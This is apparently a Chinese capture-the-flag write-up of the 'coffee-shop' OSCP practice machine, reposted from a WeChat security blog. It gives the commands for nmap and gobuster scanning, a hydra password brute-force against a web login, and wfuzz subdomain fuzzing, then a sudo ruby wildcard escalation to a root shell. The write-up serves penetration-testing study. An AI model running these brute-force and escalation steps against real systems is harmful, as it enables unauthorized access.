OSCP 靶场
靶场介绍
|
coffee-shop |
easy |
信息收集、凭据收集、cron 提权、sudo 提权 |
信息收集
主机发现
└─# nmap -sn 192.168.31.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-12 07:48 EST
Nmap scan report for XiaoQiang (192.168.31.1)
Host is up (0.0060s latency).
MAC Address: D4:DA:21:93:9E:34 (Beijing Xiaomi Mobile Software)
Nmap scan report for 192.168.31.11
Host is up (0.0059s latency).
MAC Address: BC:6E:E2:36:A6:64 (Intel Corporate)
Nmap scan report for 192.168.31.20
Host is up (0.0010s latency).
MAC Address: 08:00:27:2A:FE:97 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.31.34
Host is up (0.057s latency).
MAC Address: CA:BF:4C:0C:6D:37 (Unknown)
Nmap scan report for 192.168.31.181
Host is up.端口扫描
└─# nmap -sV -A -p- -T4 192.168.31.20
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-12 07:48 EST
Nmap scan report for 192.168.31.20
Host is up (0.0027s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 81:a4:52:2b:14:3f:13:68:2b:e2:5b:c4:7b:d7:1a:a5 (ECDSA)
|_ 256 25:19:09:29:2f:b8:ea:b4:29:1f:6d:e7:13:d6:be:7e (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Under Construction - Midnight Coffee
|_http-server-header: Apache/2.4.52 (Ubuntu)
MAC Address: 08:00:27:2A:FE:97 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 2.73 ms 192.168.31.20
添加域名
目录扫描
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://midnight.coffee -x php,html,txt -e
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://midnight.coffee/shop -x php,html,txt -e
hydra -l shopadmin -P /usr/share/wordlists/rockyou.txt 192.168.31.20 http-post-form "/:username=shopadmin&password=^PASS^:invalid"子域名信息
wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://midnight.coffee -H 'HOST: FUZZ.midnight.coffee' --hh 1690
添加子域名访问后,直接获取后台账号密码,登录后获取ssh账号密码
权限获取
通过上面获取的账号密码成功登录到tuna 账号
凭据收集获取到mysql 的账号密码,登录数据库后找到shopadmin 用户的账号密码
爆破失败
权限提升
viminfo 存在任务计划
这里可以看到运行的是*.sh 文件,那么我们直接写一个后缀为.sh 的脚本文件到/tmp目录下即可
由于 sudo 允许的路径包含星号 (*),因此我们可以在该路径中插入其他可执行的脚本进行提权
echo "exec '/bin/bash'" > /tmp/shell.rb
sudo /usr/bin/ruby /tmp/shell.rb /opt/shop.rb
script /dev/null -c bash
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】coffee-shop
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论